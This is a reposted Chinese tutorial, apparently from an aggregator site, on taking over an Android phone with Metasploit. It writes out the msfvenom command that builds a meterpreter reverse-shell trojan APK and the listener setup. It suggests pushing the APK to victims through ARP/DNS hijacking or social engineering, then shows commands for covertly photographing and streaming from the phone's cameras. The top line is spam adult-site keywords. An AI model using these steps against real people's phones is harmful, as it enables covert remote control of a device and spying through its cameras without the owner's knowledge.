国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

MSF入侵安卓手機(jī)

這篇具有很好參考價(jià)值的文章主要介紹了MSF入侵安卓手機(jī)。希望對大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

MSF是Metasploit的簡稱,Metasploit是一款開源的安全漏洞檢測工具,非常強(qiáng)大,分別有Windows版和Linux版,工具里集成了許多微軟公布的漏洞(0day)。

我這里做測試的系統(tǒng)是Backbox linux ,這是一款網(wǎng)絡(luò)滲透,信息安全評(píng)估系統(tǒng)。里邊安裝了許許多多的工具。其中MSF就自帶有。當(dāng)然還有其它的 比如Kali linux 、Back Track這些等等。

環(huán)境:Backbox linux+MSF

目標(biāo):一臺(tái)安卓手機(jī)

既然是入侵安卓手機(jī),肯定要先配置一個(gè)安卓木馬,那我們看看本機(jī)的IP?

MSF入侵安卓手機(jī)

本機(jī)IP:192.168.1.6

在到終端輸入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk

以前的MSF老版本是用msfpayload生成木馬 現(xiàn)在在新版本中都用msfvenom代替了,所以有些朋友在終端輸入msfpayload的時(shí)候 會(huì)提示

msfpayload無法找到命令 所以使用msfvenom即可,這里L(fēng)HOST 對應(yīng)的是本機(jī)的IP地址 LPORT對應(yīng)你要監(jiān)聽的端口 然后生成木馬的路徑

MSF入侵安卓手機(jī)

這樣我們就在/root/路徑下生成了一個(gè)APK的安卓木馬文件,至于木馬的免殺暫且不談?,F(xiàn)在我們在來啟動(dòng)MSF工具

輸入命令:msfconsole

MSF入侵安卓手機(jī)

然后輸入:

1. use exploit/multi/handler 加載模塊

2.?set payload android/meterpreter/reverse_tcp ?選擇Payload

3.show options 查看參數(shù)設(shè)置

MSF入侵安卓手機(jī)

我們看見payload里邊有兩個(gè)參數(shù)要設(shè)置 LHOST和LPORT 表示地址和端口 默認(rèn)的端口是4444 現(xiàn)在我們來更改設(shè)置

1.set LHOST 192.168.1.6 這里的地址設(shè)置成我們剛才生成木馬的IP地址

2.set LPORT 5555 這里的端口設(shè)置成剛才我們生成木馬所監(jiān)聽的端口

3.exploit 開始執(zhí)行漏洞 開始監(jiān)聽...

MSF入侵安卓手機(jī)

OK,一切準(zhǔn)備工作準(zhǔn)備就緒。?!,F(xiàn)在要做的就是把木馬文件搞到人家的手機(jī)上,思路有很多 可以DNS arp劫持欺騙 只要對方用手機(jī)下載文件 就會(huì)下載我們的木馬文件

還有社工什么等等的,這里我就簡單的把木馬文件弄我自己的手機(jī)上做測試

MSF入侵安卓手機(jī)

安裝完成后 會(huì)在桌面上生成一個(gè)MainActivity的程序圖標(biāo) 這個(gè)就是我們剛才生成的木馬 當(dāng)我們點(diǎn)擊了這個(gè)圖標(biāo) 手機(jī)會(huì)沒有任何反應(yīng) 其實(shí)木馬已經(jīng)開始運(yùn)行起來了

我們可以在我們的MSF里看見有一個(gè)會(huì)話連接了

MSF入侵安卓手機(jī)

這樣對方的手機(jī)就就被我們控制了,查看手機(jī)系統(tǒng)信息,輸入命令 sysinfo

MSF入侵安卓手機(jī)

MSF入侵安卓手機(jī)

webcam_list查看手機(jī)攝影頭有幾個(gè) 這里顯示兩項(xiàng) 分別表示有前后兩個(gè)攝像頭

MSF入侵安卓手機(jī)

?webcam_snap 隱秘拍照功能

后邊跟上參數(shù)-i 指定使用那個(gè)攝像頭拍照

可以看見我們分別對前后攝像頭都拍了照 保存到了桌面上

還可以輸入命令?webcam_stream 開啟攝像頭?

其它的功能還有更多 。暫時(shí)就先到這吧。。。

搜集整理的學(xué)習(xí)路線&筆記https://mp.weixin.qq.com/s/KQx_eIwdjCj3QdErxKb7ZQ文章來源地址http://www.zghlxwxcb.cn/news/detail-460590.html

到了這里,關(guān)于MSF入侵安卓手機(jī)的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • Metasploit Framework(MSF)基礎(chǔ)框架

    Metasploit Framework(MSF)基礎(chǔ)框架

    Metasploit框架(Metasploit Framework,MSF)是一個(gè)開源工具,旨在方便滲透測試,它是由Ruby程序語言編寫的模板化框架,具有很好的擴(kuò)展性,便于滲透測試人員開發(fā)、使用定制的工具模板。 常見名詞解釋: POC : Proof of Concept ,概念證明,用來證明漏洞存在的一段代碼,沒有攻擊性

    2024年02月08日
    瀏覽(20)
  • 內(nèi)網(wǎng)滲透 Metasploit(MSF)基礎(chǔ)使用

    內(nèi)網(wǎng)滲透 Metasploit(MSF)基礎(chǔ)使用

    ? Metasploit 是一款開源的安全漏洞檢測工具,可以幫助安全和IT專業(yè)人士識(shí)別安全性問題,驗(yàn)證漏洞的緩解措施,并管理專家驅(qū)動(dòng)的安全性進(jìn)行評(píng)估,提供真正的安全風(fēng)險(xiǎn)情報(bào)。這些功能包括智能開發(fā),代碼審計(jì),Web應(yīng)用程序掃描,社會(huì)工程。團(tuán)隊(duì)合作,在 Metasploit 和綜合報(bào)

    2024年01月16日
    瀏覽(28)
  • 一、初識(shí)Metasploit(MSF使用詳解超詳細(xì))

    一、初識(shí)Metasploit(MSF使用詳解超詳細(xì))

    前言 :Metasploit是The Metasploit Framework的簡稱,也可以叫做MSF! MSF高度模塊化即框架由多個(gè)module組成,是全球最受歡迎的工具。 Metasploit Framework(MSF)遠(yuǎn)遠(yuǎn)不僅僅是一個(gè)漏洞的集合。這是您可以建立和利用您的自定義需求的基礎(chǔ)架構(gòu)。這使您可以專注于您獨(dú)特的環(huán)境,而不必重新

    2024年02月08日
    瀏覽(67)
  • metasploit(MSF)滲透超細(xì)解說 -- 小黑滲透工具

    metasploit(MSF)滲透超細(xì)解說 -- 小黑滲透工具

    metasploit Framework(msf)里帶數(shù)千個(gè)已知的軟件漏洞,并保持持續(xù)更新,Metasploit可以用來信息收集、漏洞探測、漏洞利用等滲透測試的全流程,采用Ruby語言編寫。黑掉整個(gè)宇宙的稱號(hào)?。。?初心:? ? 記錄msfconsole的滲透測試流程,以及每個(gè)流程點(diǎn)常用到的一些命令,其中還有

    2024年01月20日
    瀏覽(30)
  • 一條命令上線MSF(Metasploit)-web_delivery模塊

    一條命令上線MSF(Metasploit)-web_delivery模塊

    最近比較多人問我,如果在實(shí)戰(zhàn)里getshell了,比如各種OA的rce,但是會(huì)碰到權(quán)限很低,不是root或者是system權(quán)限的情況,而且在拿到shell之后不知道怎么提權(quán),不知道下一步該干嘛,后滲透不是很熟練等等等等。所以我就趁今晚月色那么漂亮,順便記一下web_delivery模塊。 如果被

    2024年02月10日
    瀏覽(26)
  • Metasploit (MSF) 使用:包含基本使用、payload生成、后滲透模塊使用

    Metasploit (MSF) 使用:包含基本使用、payload生成、后滲透模塊使用

    博主根據(jù)日后學(xué)習(xí)會(huì)不斷更新文章,后續(xù)用到新的功能會(huì)不定時(shí)更新。 以下內(nèi)容只供學(xué)習(xí)使用,請勿違法使用! 目錄 一、常用指令 二、監(jiān)聽模塊 2.1 防止假session 2.2 實(shí)現(xiàn)后臺(tái)持續(xù)監(jiān)聽 三、msfvenom(payload生成模塊) 3.1 參數(shù)介紹 3.2 常用指令 3.3 payload?生成 3.3.1 Linux 3.3.2 Windows

    2024年02月07日
    瀏覽(44)
  • 肥腸恐布--探索Kali Linux中的Metasploit Framework(MSF聽說腎透大佬經(jīng)常用)

    肥腸恐布--探索Kali Linux中的Metasploit Framework(MSF聽說腎透大佬經(jīng)常用)

    請注意,在使用Metasploit Framework進(jìn)行滲透測試和漏洞利用時(shí),務(wù)必遵守合法和授權(quán)的原則,此文僅供大家學(xué)習(xí)參考,請確保您獲得了適當(dāng)?shù)氖跈?quán),并遵守法律和合規(guī)性要求。非法使用和濫用導(dǎo)致嚴(yán)重的法律后果自負(fù)。 目錄 前言 一、什么是Metasploit Framework(MSF)? 二、Metaspl

    2024年02月15日
    瀏覽(37)
  • 記一次MSF永恒之藍(lán)入侵win7系統(tǒng)實(shí)驗(yàn)

    記一次MSF永恒之藍(lán)入侵win7系統(tǒng)實(shí)驗(yàn)

    ? 目錄 1.環(huán)境搭建 2.實(shí)驗(yàn)開始 1# 保證兩個(gè)主機(jī)之間可以ping通 2# kali打開msfconsole 3# 由于目標(biāo)為win7系統(tǒng),我們選擇永恒之藍(lán)漏洞攻擊(ms17-010) 4# 獲取目標(biāo)機(jī)cmd? 5# meterpreter基礎(chǔ)命令 攻擊源ip:192.168.193.130? ? ?#系統(tǒng):kali? ? ? 鏡像下載地址:點(diǎn)擊跳轉(zhuǎn) ?靶 機(jī)??ip:192.168.19

    2024年02月13日
    瀏覽(22)
  • Metasploit生成Android木馬遠(yuǎn)控自己的安卓設(shè)備

    Metasploit生成Android木馬遠(yuǎn)控自己的安卓設(shè)備

    聲明,本文實(shí)驗(yàn)僅用作學(xué)習(xí)和測試實(shí)驗(yàn)請勿用作他途 我們先用frp工具來實(shí)現(xiàn)端口映射,利用處在內(nèi)網(wǎng)的攻擊機(jī)kali實(shí)現(xiàn)對處在外網(wǎng)的Android機(jī)器的入侵。 目標(biāo)Android設(shè)備 公網(wǎng)vps(centos) 內(nèi)網(wǎng)攻擊機(jī)kali 公網(wǎng)vps運(yùn)行frp server 本地kali運(yùn)行frp client 將kali本地端口映射到公網(wǎng)vps 將vps作為

    2024年02月02日
    瀏覽(25)
  • MSF手機(jī)滲透實(shí)驗(yàn)

    MSF手機(jī)滲透實(shí)驗(yàn)

    ? 本實(shí)驗(yàn)是在kail里面使用msf工具生成一個(gè)Android木馬程序,然后客戶端進(jìn)行下載,從而滲透。 實(shí)驗(yàn)范圍為局域網(wǎng)的手機(jī),即入侵的手機(jī)要與電腦處于同一個(gè)網(wǎng)段,這就需要將虛擬機(jī)設(shè)置為橋接模式,并手動(dòng)配置ip。 此時(shí)手機(jī)的ip段為192.168.43.0段故需要更改虛擬機(jī)ip 更改靜態(tài)i

    2024年02月11日
    瀏覽(23)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包